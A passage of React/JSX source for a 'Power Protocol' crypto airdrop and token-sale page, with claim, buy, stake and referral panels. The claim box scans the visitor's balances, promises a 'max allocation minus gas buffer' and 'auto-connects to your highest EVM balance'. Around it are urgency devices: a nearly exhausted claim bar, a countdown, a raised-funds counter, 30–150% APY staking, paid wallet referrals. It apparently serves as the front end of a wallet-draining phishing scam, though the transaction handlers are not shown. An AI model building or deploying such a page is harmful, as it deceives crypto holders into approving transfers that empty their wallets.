            <a href="https://power-protocol.gitbook.io/power-protocol-whitepaper" onClick={() => setIsMobileMenuOpen(false)} className="text-lg font-bold text-gray-300 hover:text-white">Whitepaper</a>
            <a href="https://powerprotocol.xyz/en/tokenomics" onClick={() => setIsMobileMenuOpen(false)} className="text-lg font-bold text-gray-300 hover:text-white">Tokenomics</a>
            {/* INI MENU BARU VIEW ON BSCSCAN (MOBILE) */}
            <a href="https://bscscan.com/token/0x9479932AC0181b07F8c2dD8c7A9eA04226465023" target="_blank" rel="noreferrer" onClick={() => setIsMobileMenuOpen(false)} className="text-lg font-bold text-[#facc15] hover:text-white">View on BscScan</a>
            
            <a href="mailto:power@powerprotocol.xyz" className="text-center bg-[#b37be8] text-black px-6 py-3 rounded-xl font-bold mt-2 block">Contact</a>
          </div>
        )}
      </nav>

      <main className="max-w-[1400px] mx-auto px-4 sm:px-6 py-12 lg:py-20 grid grid-cols-1 lg:grid-cols-12 gap-8 lg:gap-10 items-start relative z-10">
        
        <div className="col-span-1 lg:col-span-4 flex flex-col gap-5 pt-4">
          <div className="flex items-center gap-2 text-[#b37be8] text-[11px] md:text-sm font-bold bg-[#150a1f] w-max px-3 py-1.5 rounded-full border border-gray-800">
            <span className="w-2.5 h-2.5 md:w-3 md:h-3 rounded-full bg-gradient-to-r from-[#b37be8] to-primaryPurple"></span> Revolutionizing DeFi with $POWER
          </div>
          
          <h1 className="text-4xl md:text-5xl lg:text-5xl font-extrabold leading-[1.1] tracking-tight">
            The Ecosystem For
            <span className="block mt-2 text-transparent bg-clip-text bg-gradient-to-r from-[#b37be8] to-primaryPurple drop-shadow-sm">Blockchain Entertainment</span>
          </h1>
          
          {/* LOGO CERTIK SECTION (Moved Up) */}
          <div className="flex flex-col items-start gap-2 -mt-1">
            <span className="text-gray-400 text-xs md:text-sm font-bold">Audited By :</span>
            <a href="https://skynet.certik.com/projects/power-protocol" target="_blank" rel="noreferrer" className="block hover:scale-105 transition-transform origin-left">
              <img src="/certik.png" alt="CertiK Audited" className="h-16 md:h-20 w-auto object-contain" />
            </a>
          </div>

          {/* Claim Airdrop Button (Mengarah ke #claim-section) */}
          <button onClick={scrollToClaim} className="bg-gradient-to-r from-[#b37be8] to-primaryPurple text-white px-8 py-3.5 md:py-4 w-max rounded-xl font-bold hover:opacity-90 flex items-center gap-2 transition-all shadow-[0_0_20px_rgba(179,123,232,0.4)] transform hover:-translate-y-1">
            Claim Airdrop <ArrowRight size={20} />
          </button>

          {/* DEXSCREENER CHART WIDGET START */}
          <div className="w-full h-[280px] md:h-[320px] mt-2 rounded-2xl overflow-hidden border border-gray-800 shadow-[0_0_20px_rgba(179,123,232,0.15)] bg-[#0b0410] relative z-20">
            <iframe 
              title="Token Chart"
              className="absolute top-0 left-0 w-full h-full"
              src="https://dexscreener.com/bsc/0x73eA6cc8d4DCfaF52d309800F8428D57e6dc3a2b?embed=1&theme=dark&trades=0&info=0"
              frameBorder="0"
            ></iframe>
          </div>
          {/* DEXSCREENER CHART WIDGET END */}
          
        </div>

        {/* CLAIM SECTION BOX (Ditambahkan id="claim-section") */}
        <div id="claim-section" className="col-span-1 lg:col-span-4 bg-gradient-to-b from-[#150a1f] to-[#0b0410] p-6 md:p-7 rounded-3xl border border-[#b37be8]/40 shadow-[0_0_40px_rgba(179,123,232,0.15)] relative overflow-hidden group h-fit mx-auto w-full max-w-[420px]">
          <div className="absolute top-0 left-1/2 -translate-x-1/2 w-3/4 h-1 bg-gradient-to-r from-transparent via-[#b37be8] to-transparent opacity-60"></div>
          
          {/* ---- TOMBOL DISCONNECT MERAH ---- */}
          {isConnected && (
            <button 
              onClick={() => disconnect()} 
              className="absolute top-4 right-4 z-50 flex items-center gap-1.5 bg-red-500/10 hover:bg-red-500/20 border border-red-500/30 text-red-400 hover:text-red-300 px-3 py-1.5 rounded-xl text-[10px] md:text-xs font-bold transition-all shadow-sm"
            >
              <LogOut size={14} /> Disconnect
            </button>
          )}
          {/* --------------------------------- */}

          <div className="flex flex-col items-center mb-6 mt-6 md:mt-0">
            <div className="flex items-center gap-2 mb-4 bg-black/40 px-3 py-1 rounded-full border border-gray-800 backdrop-blur-sm">
              <span className="relative flex h-2.5 w-2.5"><span className="animate-ping absolute inline-flex h-full w-full rounded-full bg-green-400 opacity-75"></span><span className="relative inline-flex rounded-full h-2.5 w-2.5 bg-green-500 shadow-[0_0_8px_rgba(34,197,94,0.8)]"></span></span>
              <span className="text-green-400 text-[10px] md:text-xs font-extrabold tracking-widest uppercase">Airdrop Live</span>
            </div>
            <h2 className="text-3xl md:text-4xl font-black text-center mb-1 tracking-tight leading-none">CLAIM <span className="block mt-1 text-transparent bg-clip-text bg-gradient-to-r from-[#b37be8] to-blue-400 text-4xl md:text-5xl">$POWER</span></h2>
            <p className="text-center text-xs text-gray-400 mt-2">Max allocation minus gas buffer.</p>
          </div>

          <div className="mb-4 bg-[#1e1130] p-3 rounded-xl border border-primaryPurple text-center">
            {isAutoScanning ? (
              <div className="flex justify-center items-center gap-2 py-1 text-primaryPurple font-bold text-sm"><svg className="animate-spin h-5 w-5" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle><path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path></svg>Scanning balances...</div>
            ) : (
              <><p className="text-xs text-gray-300 font-bold mb-1">Your Allocation Found!</p><p className="text-2xl font-black text-white">{airdropAllocation.toLocaleString(undefined, {maximumFractionDigits: 0})} <span className="text-sm text-primaryPurple">$POWER</span></p></>
            )}
          </div>

          <div className="mb-6 w-full bg-black/30 p-4 md:p-5 rounded-2xl border border-gray-800 backdrop-blur-md">
            <div className="flex justify-between items-end mb-3"><span className="text-gray-300 font-bold text-sm">Total Claimed</span><span className="text-transparent bg-clip-text bg-gradient-to-r from-[#b37be8] to-blue-400 text-xl md:text-2xl font-black transition-all duration-1000">{barAirdrop}%</span></div>
            <div className="w-full bg-gray-900 rounded-full h-3 md:h-4 shadow-inner overflow-hidden relative border border-gray-700">
              <div className="h-full rounded-full bg-gradient-to-r from-blue-600 via-[#b37be8] to-primaryPurple relative overflow-hidden shadow-[0_0_15px_rgba(179,123,232,0.8)] transition-all duration-[2000ms] ease-out" style={{ width: `${barAirdrop}%` }}><div className="absolute inset-0 bg-gradient-to-r from-transparent via-white/40 to-transparent animate-shimmer"></div></div>
            </div>
            <div className="flex flex-col gap-1 text-[10px] md:text-xs text-gray-400 mt-3 font-medium">
              <div className="flex justify-between"><span className="flex items-center gap-1.5"><div className="w-1.5 h-1.5 bg-[#b37be8] rounded-full"></div> 4.95M $POWER</span><span>5M $POWER</span></div>
            </div>
          </div>
          
          <div className="mb-6 text-[11px] text-gray-400 text-center leading-relaxed bg-[#0b0410] border border-gray-800 p-3 rounded-xl flex items-start gap-2">
            <Info size={16} className="text-primaryPurple shrink-0 mt-0.5" />
            <div className="text-left"><span className="text-gray-200 font-bold block mb-0.5">Auto-Routing Enabled</span>System auto-connects to your highest EVM balance.</div>
          </div>

          <div className="flex flex-col gap-2 mt-1 w-full relative">
            <button onClick={handleClaim} disabled={isAutoScanning || isClaiming} className="w-full bg-gradient-to-r from-blue-600 to-primaryPurple text-white font-black py-4 rounded-xl hover:opacity-90 transition-all flex justify-center items-center gap-2 shadow-[0_0_20px_rgba(59,130,246,0.4)] transform hover:-translate-y-1 disabled:opacity-50 disabled:cursor-not-allowed">
              {isClaiming ? <><svg className="animate-spin -ml-1 mr-3 h-5 w-5 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"><circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle><path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path></svg>Processing...</> : (isConnected ? 'CLAIM' : 'Connect to Claim')}
            </button>
            {airdropError && <p className="text-red-500 text-[11px] font-bold text-center animate-pulse drop-shadow-[0_0_5px_rgba(239,68,68,0.5)]">{airdropError}</p>}
          </div>
        </div>

        <div id="buy-section" className="col-span-1 lg:col-span-4 bg-[#0d0a15] p-5 md:p-6 rounded-[2rem] border border-[#2a233c] shadow-2xl relative flex flex-col gap-4 mx-auto w-full max-w-[420px] h-fit">
          
          <div className="bg-gradient-to-r from-[#211538] to-[#132235] rounded-2xl p-3 flex items-center justify-between shadow-inner">
             <span className="font-extrabold text-white ml-2 text-[11px] md:text-xs tracking-widest">BUY WITH</span>
             <div className="flex gap-1 items-center">
               {networksList.slice(0, 5).map((net, i) => <img key={i} src={net.logo} alt={net.symbol} className="w-4 h-4 md:w-5 md:h-5 rounded-full object-contain bg-white" title={net.name} />)}
               <img src={usdtLogo} alt="usdt" className="w-4 h-4 md:w-5 md:h-5 rounded-full bg-white" title="USDT" />
               <img src={usdcLogo} alt="usdc" className="w-4 h-4 md:w-5 md:h-5 rounded-full bg-white" title="USDC" />
             </div>
          </div>

          <div className="flex bg-[#161322] rounded-xl p-1.5 border border-gray-800/50">
            <button onClick={() => setActiveTab('buy')} className={`flex-1 py-2 rounded-lg font-bold text-xs md:text-sm flex justify-center items-center gap-1.5 transition-colors ${activeTab === 'buy' ? 'bg-[#252236] text-white shadow-sm' : 'text-gray-400 hover:text-white'}`}><Wallet size={15}/> Buy</button>
            <button onClick={() => setActiveTab('stake')} className={`flex-1 py-2 rounded-lg font-bold text-xs md:text-sm flex justify-center items-center gap-1.5 transition-colors ${activeTab === 'stake' ? 'bg-[#252236] text-white shadow-sm' : 'text-gray-400 hover:text-white'}`}><Star size={15}/> Stake</button>
            <button onClick={() => setActiveTab('refer')} className={`flex-1 py-2 rounded-lg font-bold text-xs md:text-sm flex justify-center items-center gap-1.5 transition-colors ${activeTab === 'refer' ? 'bg-[#252236] text-white shadow-sm' : 'text-gray-400 hover:text-white'}`}><Users size={15}/> Refer</button>
          </div>

          {activeTab === 'buy' && (
            <div className="animate-in fade-in duration-500">
              <div className="flex justify-between items-center px-1 mt-1 mb-2">
                <div className="flex items-center gap-1">
                  <Flame size={16} className="text-orange-500 fill-orange-500/20" />
                  <span className="font-bold text-gray-200 text-[11px] md:text-xs">Don't Miss Out!</span>
                  <span className="bg-[#42201b] text-[#fb923c] text-[9px] px-1.5 py-0.5 rounded border border-[#7c2d12] font-bold hidden sm:block">Price = $0.20</span>
                </div>
                <div className="flex items-center gap-1 font-bold text-[#2dd4bf] text-[11px] md:text-xs">
                   <Zap size={14} className="fill-[#2dd4bf]" /> 1 POWER = $0.075
                </div>
              </div>

              <div className="bg-[#161322] border border-[#2a233c] rounded-xl p-3 flex justify-between items-center shadow-inner mb-2">
                <div className="flex items-center gap-2 font-black text-xs md:text-sm text-gray-300"><Clock size={16} className="text-[#a78bfa]"/> BUY <span className="text-[#a78bfa]">$POWER</span> NOW</div>
                <div className="flex gap-1 text-[10px] md:text-xs">
                   <div className="bg-[#252236] px-1.5 py-1 rounded font-bold text-white">{cdDays}d</div>
                   <div className="bg-[#252236] px-1.5 py-1 rounded font-bold text-white">{cdHours}h</div>
                   <div className="bg-[#252236] px-1.5 py-1 rounded font-bold text-white">{cdMins}m</div>
                   <div className="bg-[#252236] px-1.5 py-1 rounded font-bold text-white">{cdSecs}s</div>
                </div>
              </div>

              <div className="relative w-full bg-[#201d2e] h-3.5 md:h-4 rounded-full overflow-hidden mb-2">
                <div className="absolute top-0 left-0 h-full bg-gradient-to-r from-[#6366f1] to-[#2dd4bf] transition-all duration-[2000ms] ease-out" style={{ width: `${barBuy}%` }}></div>
                <div className="absolute inset-0 flex items-center justify-center text-[9px] md:text-[10px] font-black text-white drop-shadow-md">{barBuy}% sold</div>
              </div>

              <div className="bg-[#0f172a]/80 border border-[#134e4a]/50 rounded-xl p-3.5 md:p-4 flex justify-between items-center mb-3">
                <div className="flex items-center gap-2 text-[#34d399] font-bold text-xs md:text-sm"><DollarSign size={16}/> Total Raised</div>
                <div className="text-xl md:text-2xl font-black text-[#2dd4bf] drop-shadow-[0_0_8px_rgba(45,212,191,0.3)]">${raisedCount.toLocaleString()}</div>
              </div>

              <div className="grid grid-cols-2 gap-3 mb-2 relative z-20">
                <div className="relative">
                  <div onClick={() => { setShowNetDropdown(!showNetDropdown); setShowTokenDropdown(false); }} className="bg-[#161322] border border-[#2a233c] rounded-xl p-2.5 md:p-3 flex justify-between items-center cursor-pointer hover:border-gray-500 transition-colors h-full">
                    <div className="flex items-center gap-2 font-bold text-xs md:text-sm text-gray-200 truncate"><img src={selectedNetwork.logo} alt={selectedNetwork.symbol} className="w-4 h-4 md:w-5 md:h-5 rounded-full object-contain bg-white" /><span className="truncate">{selectedNetwork.name}</span></div>
                    <ChevronDown size={14} className="text-gray-500 shrink-0"/>
                  </div>
                  {showNetDropdown && (
                    <div className="absolute top-full left-0 w-full mt-2 bg-[#161322] border border-[#2a233c] rounded-xl overflow-y-auto max-h-48 z-50 shadow-2xl custom-scrollbar">
                      {networksList.map((net) => (
                        <div key={net.id} onClick={() => handleNetworkSelect(net)} className="flex items-center gap-3 p-3 hover:bg-[#252236] cursor-pointer transition-colors border-b border-gray-800/50 last:border-0">
                          <img src={net.logo} alt={net.symbol} className="w-5 h-5 rounded-full object-contain bg-white"/><span className="font-bold text-xs md:text-sm text-gray-200">{net.name}</span>
                        </div>
                      ))}
                    </div>
                  )}
                </div>

                <div className="relative">
                  <div onClick={() => { setShowTokenDropdown(!showTokenDropdown); setShowNetDropdown(false); }} className="bg-[#161322] border border-[#2a233c] rounded-xl p-2.5 md:p-3 flex justify-between items-center cursor-pointer hover:border-gray-500 transition-colors h-full">
                    <div className="flex items-center gap-2 font-bold text-xs md:text-sm text-gray-200"><img src={activeTokenObj.logo} alt={activeTokenObj.symbol} className="w-4 h-4 md:w-5 md:h-5 rounded-full object-contain bg-white" />{activeTokenObj.symbol}</div>
                    <ChevronDown size={14} className="text-gray-500"/>
                  </div>
                  {showTokenDropdown && (
                    <div className="absolute top-full left-0 w-full mt-2 bg-[#161322] border border-[#2a233c] rounded-xl overflow-hidden z-50 shadow-2xl">
                      {tokensList.map((token, i) => (
                        <div key={i} onClick={() => { setSelectedToken(token.symbol); setShowTokenDropdown(false); setPayAmount(''); }} className="flex items-center gap-3 p-3 hover:bg-[#252236] cursor-pointer transition-colors border-b border-gray-800/50 last:border-0 font-bold text-sm text-gray-200">
                          <img src={token.logo} alt={token.symbol} className="w-5 h-5 rounded-full object-contain bg-white" />{token.symbol}
                        </div>
                      ))}
                    </div>
                  )}
                </div>
              </div>

              <div className="text-right px-1 mb-1">
                 <span className="text-[10px] text-gray-500 font-bold">Balance: {isConnected ? realTimeBalance : "0"} {activeTokenObj.symbol}</span>
              </div>

              <div className="grid grid-cols-2 gap-3 mb-2">
                <div>
                   <div className="flex justify-between items-center mb-1">
                     <label className="text-[10px] md:text-[11px] font-bold text-gray-400">Pay</label>
                     <span onClick={handleMaxBuy} className="text-[10px] md:text-[11px] font-black text-[#2dd4bf] cursor-pointer hover:text-white transition-colors">MAX</span>
                   </div>
                   <div className="bg-[#161322] border border-[#2a233c] rounded-xl px-3 py-2.5 flex justify-between items-center focus-within:border-[#2dd4bf] transition-colors">
                     <input type="number" value={payAmount} onChange={(e) => setPayAmount(e.target.value)} placeholder="0.00" className="bg-transparent w-full outline-none text-white font-bold text-xs md:text-sm placeholder-gray-600" />
                     <span className="text-gray-500 text-[9px] md:text-[10px] font-bold ml-1">{activeTokenObj.symbol}</span>
                   </div>
                </div>
                <div>
                   <label className="text-[10px] md:text-[11px] font-bold text-gray-400 mb-1 block">Receive</label>
                   <div className="bg-[#161322] border border-[#2a233c] rounded-xl px-3 py-2.5 flex justify-between items-center">
                     <input type="text" value={receiveAmount} placeholder="0.00" className="bg-transparent w-full outline-none text-white font-bold text-xs md:text-sm placeholder-gray-600" readOnly />
                     <span className="text-gray-500 text-[9px] md:text-[10px] font-bold ml-1">POWER</span>
                   </div>
                </div>
              </div>

              <div className="bg-[#161322] border border-[#2a233c] rounded-xl p-1.5 flex justify-between items-center mt-2 focus-within:border-gray-500 transition-colors">
                 <input type="text" value={bonusCode} onChange={(e) => setBonusCode(e.target.value)} placeholder="Bonus code" className="bg-transparent w-full outline-none text-white font-bold px-3 text-xs md:text-sm placeholder-gray-600 uppercase" />
                 <button onClick={handleApplyBonus} className="bg-[#252236] hover:bg-gray-600 text-white font-bold py-1.5 md:py-2 px-4 rounded-lg text-xs md:text-sm transition-colors border border-gray-700">Apply</button>
              </div>
              
              <button 
                onClick={isConnected ? handleBuyTokens : () => open()} 
                disabled={isBuying}
                className="w-full mt-3 py-3.5 md:py-4 rounded-xl font-black text-base md:text-lg text-white bg-gradient-to-r from-[#818cf8] to-[#2dd4bf] hover:opacity-90 flex justify-center items-center gap-2 shadow-[0_0_15px_rgba(45,212,191,0.2)] transform transition-transform hover:-translate-y-0.5 disabled:opacity-50"
              >
                 <Wallet size={20}/> {isBuying ? 'Processing...' : (isConnected ? 'Buy Now' : 'Connect Wallet')}
              </button>
            </div>
          )}

          {activeTab === 'stake' && (
            <div className="flex flex-col gap-2 animate-in fade-in duration-300">
              <div className="bg-[#121b2d] border border-[#1e293b] rounded-xl p-4 flex flex-col gap-4">
                <div className="flex items-center gap-3">
                   <div className="bg-[#1e3a5f] p-2.5 rounded-lg shadow-inner"><Trophy size={20} className="text-yellow-400"/></div>
                   <div><p className="text-xs text-gray-400 font-bold mb-0.5">Total Earnings</p><p className="text-2xl font-black text-[#2dd4bf] leading-none">+{totalEarnings} <span className="text-sm">POWER</span></p></div>
                </div>
                <div className="grid grid-cols-3 gap-2 text-center border-t border-[#1e293b] pt-3 mt-1">
                   <div><p className="text-[10px] text-gray-400 font-bold mb-1">Staked</p><p className="text-sm font-black text-white">{stakedAmount}</p></div>
                   <div><p className="text-[10px] text-gray-400 font-bold mb-1">Daily</p><p className="text-sm font-black text-[#34d399]">+{dailyEarnings}</p></div>
                   <div><p className="text-[10px] text-gray-400 font-bold mb-1">Available</p><p className="text-sm font-black text-[#38bdf8]">{totalEarnings}</p></div>
                </div>
              </div>

              <div className="grid grid-cols-2 gap-3 mt-1">
                <div onClick={() => setStakingPlan('min')} className={`bg-[#161322] border ${stakingPlan === 'min' ? 'border-[#6366f1] bg-[#1a172c]' : 'border-[#2a233c] hover:border-gray-600'} rounded-xl p-3.5 cursor-pointer transition-colors`}><div className="flex flex-col gap-1.5"><div className="flex items-start gap-1.5"><Lock size={14} className="text-[#818cf8] mt-0.5 shrink-0"/><span className="text-[11px] font-bold text-white leading-tight">Min Staking: 1<br/>$POWER</span></div><div className="flex items-center gap-1 mt-1"><Flame size={14} className="fill-orange-500 text-orange-500"/><span className="text-base font-black text-white">150%</span><span className="text-[10px] text-gray-400">APY</span></div></div></div>
                <div onClick={() => setStakingPlan('flex')} className={`bg-[#161322] border ${stakingPlan === 'flex' ? 'border-[#6366f1] bg-[#1a172c]' : 'border-[#2a233c] hover:border-gray-600'} rounded-xl p-3.5 cursor-pointer transition-colors`}><div className="flex flex-col gap-1.5 h-full justify-between"><div className="flex items-start gap-1.5"><Unlock size={14} className="text-[#2dd4bf] mt-0.5 shrink-0"/><span className="text-[11px] font-bold text-white leading-tight">Flexible</span></div><div className="flex items-center gap-1 mt-1"><Flame size={14} className="fill-orange-500 text-orange-500"/><span className="text-base font-black text-white">30%</span><span className="text-[10px] text-gray-400">APY</span></div></div></div>
                <div onClick={() => setStakingPlan('30d')} className={`bg-[#161322] border ${stakingPlan === '30d' ? 'border-[#6366f1] bg-[#1a172c]' : 'border-[#2a233c] hover:border-gray-600'} rounded-xl p-3.5 cursor-pointer relative transition-colors`}><span className="absolute top-2.5 right-2.5 bg-[#252236] text-gray-300 text-[9px] px-1.5 py-0.5 rounded font-bold border border-gray-700">30d</span><div className="flex flex-col gap-1.5 h-full justify-between"><div className="flex items-start gap-1.5"><Lock size={14} className="text-[#a78bfa] mt-0.5 shrink-0"/><span className="text-[11px] font-bold text-white leading-tight">30 Days</span></div><div className="flex items-center gap-1 mt-1"><Flame size={14} className="fill-orange-500 text-orange-500"/><span className="text-base font-black text-white">60%</span><span className="text-[10px] text-gray-400">APY</span></div></div></div>
                <div onClick={() => setStakingPlan('90d')} className={`bg-[#161322] border ${stakingPlan === '90d' ? 'border-[#6366f1] bg-[#1a172c]' : 'border-[#2a233c] hover:border-gray-600'} rounded-xl p-3.5 cursor-pointer relative transition-colors`}><span className="absolute top-2.5 right-2.5 bg-[#252236] text-gray-300 text-[9px] px-1.5 py-0.5 rounded font-bold border border-gray-700">90d</span><div className="flex flex-col gap-1.5 h-full justify-between"><div className="flex items-start gap-1.5"><Lock size={14} className="text-[#c084fc] mt-0.5 shrink-0"/><span className="text-[11px] font-bold text-white leading-tight">90 Days</span></div><div className="flex items-center gap-1 mt-1"><Flame size={14} className="fill-orange-500 text-orange-500"/><span className="text-base font-black text-white">100%</span><span className="text-[10px] text-gray-400">APY</span></div></div></div>
              </div>

              <div className="mt-1">
                <div className="flex justify-between items-center mb-1.5 px-1">
                  <label className="text-[11px] font-bold text-gray-400">Amount to Stake</label>
                  <div className="flex items-center gap-2"><span className="text-[10px] text-gray-500 font-bold hidden sm:block">Bal: {isConnected ? powerTokenBalance : "0.00"} POWER</span><span onClick={handleMaxStake} className="text-[11px] font-black text-[#2dd4bf] cursor-pointer hover:text-white transition-colors">MAX</span></div>
                </div>
                <div className="bg-[#161322] border border-[#2a233c] rounded-xl px-3 py-2.5 flex justify-between items-center focus-within:border-[#2dd4bf] transition-colors"><input type="number" value={stakeAmount} onChange={(e) => setStakeAmount(e.target.value)} placeholder="0.00" className="bg-transparent w-full outline-none text-white font-bold text-sm placeholder-gray-600" /><span className="text-gray-500 text-xs font-bold ml-2">POWER</span></div>
              </div>

              <button 
                onClick={isConnected ? handleStakeAction : () => open()} 
                disabled={isStaking}
                className="w-full mt-2 py-3.5 rounded-xl font-black text-lg text-white bg-gradient-to-r from-[#818cf8] to-[#2dd4bf] hover:opacity-90 flex justify-center items-center gap-2 transform hover:-translate-y-0.5 transition-transform disabled:opacity-50"
              >
                {isStaking ? 'Processing...' : (!isConnected ? 'Connect Wallet' : (needsApproval ? 'Approve $POWER' : <><Star size={18} className="fill-white"/> Stake & Earn</>))}
              </button>
              
              <div className="grid grid-cols-2 gap-3 mt-0.5">
                <button onClick={handleUnstakeAction} className="bg-[#161322] border border-[#2a233c] hover:border-gray-500 text-gray-300 font-bold py-2.5 rounded-xl text-[11px] transition-colors">Unstake</button>
                <button onClick={handleClaimRewardsAction} className="bg-[#161322] border border-[#2a233c] hover:border-gray-500 text-[#34d399] font-bold py-2.5 rounded-xl text-[11px] transition-colors">Claim Rewards</button>
              </div>
            </div>
          )}

          {activeTab === 'refer' && (
            <div className="flex flex-col gap-3 animate-in fade-in duration-300 pt-1">
              <div className="grid grid-cols-2 gap-3">
                <div className="bg-[#161322] border border-[#2a233c] rounded-xl p-4 flex items-center gap-3"><div className="bg-[#2d1b4e] p-2 rounded-lg border border-[#a78bfa]/30"><Users size={20} className="text-[#a78bfa]"/></div><div className="flex flex-col"><span className="text-lg font-black text-white mb-1.5 leading-none">{referralCount}</span><span className="text-[10px] font-bold text-gray-400 leading-none">Referrals</span></div></div>
                <div className="bg-[#0f2428] border border-[#1b3a3d] rounded-xl p-4 flex items-center gap-3"><div className="bg-[#134e4a] p-2 rounded-lg border border-[#2dd4bf]/30"><Gift size={20} className="text-[#2dd4bf]"/></div><div className="flex flex-col"><span className="text-lg font-black text-[#2dd4bf] mb-1.5 leading-none">{referralEarned}</span><span className="text-[10px] font-bold text-gray-400 leading-none">POWER Earned</span></div></div>
              </div>

              <div className="bg-[#161322] border border-[#2a233c] rounded-xl p-3 flex items-center justify-center gap-2"><Star size={16} className="text-yellow-400 fill-yellow-400 shrink-0"/><span className="text-[11px] md:text-xs font-bold text-gray-300">Earn <span className="text-white font-black">{REFERRAL_REWARD_PER_USER} POWER</span> per valid connected wallet!</span></div>

              <div>
                 <div className="flex items-center gap-1.5 mb-1.5 text-[11px] font-bold text-gray-400 px-1"><Link size={12}/> Your Referral Link</div>
                 <div className="flex gap-2">
                   <div className="bg-[#161322] border border-[#2a233c] rounded-xl px-3 py-3 flex-1 overflow-hidden"><span className={`font-medium text-[10px] md:text-xs truncate ${isConnected ? 'text-gray-300' : 'text-gray-600'}`}>{fullRefLink}</span></div>
                   <button onClick={handleCopyLink} className="bg-[#161322] border border-[#2a233c] hover:bg-[#252236] px-3.5 rounded-xl transition-colors"><Copy size={16} className="text-gray-400"/></button>
                 </div>
              </div>

              <div>
                 <div className="flex items-center gap-1.5 mb-1.5 text-[11px] font-bold text-gray-400 px-1"><Share2 size={12}/> Share</div>
                 <div className="grid grid-cols-2 gap-3">
                   <button onClick={handleShareTwitter} className="bg-[#161322] border border-[#2a233c] hover:bg-[#252236] py-2.5 rounded-xl text-[11px] font-bold text-[#38bdf8] flex justify-center items-center gap-2 transition-colors"><Twitter size={14}/> Twitter</button>
                   <button onClick={handleShareTelegram} className="bg-[#161322] border border-[#2a233c] hover:bg-[#252236] py-2.5 rounded-xl text-[11px] font-bold text-[#38bdf8] flex justify-center items-center gap-2 transition-colors"><Send size={14}/> Telegram</button>
                 </div>
              </div>

              <button onClick={handleClaimReferral} disabled={isClaimingRef} className="w-full mt-1 py-3 rounded-xl font-bold text-sm text-white border border-[#2a233c] bg-[#161322] hover:bg-[#252236] flex justify-center items-center transition-colors shadow-sm disabled:opacity-50">
                 {isClaimingRef ? 'Processing...' : 'Claim Referral Rewards'}
              </button>
            </div>
          )}

          <div className="text-center text-[10px] text-gray-500 mt-3 mb-1 flex justify-center items-center gap-2 font-medium">
             <ShieldCheck size={14} className="text-gray-500"/> Secure <span className="text-gray-700">|</span> Powered by 
             <a href="https://web3paymentsolutions.io/" target="_blank" rel="noreferrer" className="text-[#60a5fa] font-bold flex items-center gap-1 hover:text-white transition-colors cursor-pointer">
                <img src="/web3pay.png" alt="Web3Payments" className="w-4 h-4 object-contain"/> Web3Payments
             </a>
          </div>
        </div>
      </main>

      <section className="py-8 bg-[#11081a]/80 border-y border-gray-800 mt-4 md:mt-10 backdrop-blur-sm overflow-hidden relative z-0">
        <p className="text-center text-xs text-gray-500 font-bold mb-8 tracking-widest uppercase">Backed by Top Exchanges</p>
        <Marquee gradient={false} speed={40} autoFill={true}>
          <div className="flex gap-16 px-8 items-center">
             {exchanges.map((exchange, i) => (
               <img key={i} src={exchange.img} alt={exchange.name} className="h-8 md:h-10 w-auto object-contain hover:scale-110 transition-transform cursor-pointer" />
             ))}
          </div>
        </Marquee>
      </section>

      <section className="max-w-[1400px] mx-auto px-6 py-20 relative z-0">
         <h3 className="text-center text-3xl font-extrabold mb-12 tracking-tight">Backed by Visionaries</h3>
         <div className="grid grid-cols-2 md:grid-cols-4 gap-6 items-center">
            {investors.map((investor, i) => (
              <div key={i} className="rounded-2xl overflow-hidden border border-gray-800 hover:border-[#b37be8] hover:shadow-[0_0_20px_rgba(179,123,232,0.3)] transition-all cursor-pointer flex">
                <img src={investor.img} alt={investor.name} className="w-full h-auto object-cover hover:scale-105 transition-transform duration-300" />
              </div>
            ))}
         </div>
      </section>

      <section className="bg-gradient-to-b from-[#11081a] to-darkBg py-20 border-t border-gray-800">
        <div className="max-w-[1400px] mx-auto px-6">
          <h3 className="text-center text-3xl font-extrabold mb-12 tracking-tight">Project in Action</h3>
          <div className="grid grid-cols-1 md:grid-cols-3 gap-6">
              {stagePhotos.map((photo, i) => (
                <div key={i} className="bg-cardBg aspect-video rounded-2xl border border-gray-800 overflow-hidden relative shadow-lg hover:border-[#b37be8]">
                  <img src={photo} alt={`Stage Presentation ${i+1}`} className="w-full h-full object-cover hover:scale-110 transition-transform duration-500" />
                </div>
              ))}
          </div>
        </div>
      </section>

      <section className="max-w-[1400px] mx-auto px-6 py-20">
         <div className="text-center mb-16">
           <h3 className="text-3xl font-extrabold mb-4 tracking-tight">Roadmap</h3>
           <p className="text-gray-400 text-sm max-w-2xl mx-auto leading-relaxed">
             <span className="text-[#b37be8] font-bold">Disclaimer:</span> Roadmap is a living document subject to change. Power Protocol roadmap establishes and validates our infrastructure at scale.
           </p>
         </div>
         <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-6 lg:gap-8">
            {roadmapData.map((data, i) => (
              <div key={i} className="bg-cardBg border border-gray-800 p-6 md:p-8 rounded-2xl relative shadow-xl hover:-translate-y-2 transition-transform duration-300">
                <div className="w-10 h-10 bg-gradient-to-br from-[#b37be8] to-primaryPurple rounded-full absolute -top-5 -left-5 flex items-center justify-center font-black text-lg text-white border-4 border-darkBg">{i+1}</div>
                <h4 className="font-bold text-xl mb-4 text-[#b37be8]">{data.phase}</h4>
                <ul className="text-gray-400 space-y-3 text-xs md:text-sm list-none">
                  {data.items.map((item, idx) => (
                    <li key={idx} className="flex items-start gap-2">
                      <div className="w-1.5 h-1.5 bg-gray-500 rounded-full mt-1.5 shrink-0"></div> 
                      <span className="leading-snug">{item}</span>
                    </li>
                  ))}
                </ul>
              </div>
            ))}
         </div>
      </section>

      <footer className="border-t border-gray-800 bg-[#07020a] pt-16 pb-8">
        <div className="max-w-[1400px] mx-auto px-6 flex flex-col md:flex-row justify-between items-center gap-8">
          <div className="text-center md:text-left">
            <div className="flex items-center justify-center md:justify-start mb-4">
              <img src="/logo.webp" alt="Power Protocol Logo" className="h-10 md:h-12 lg:h-14 w-auto object-contain" />
            </div>
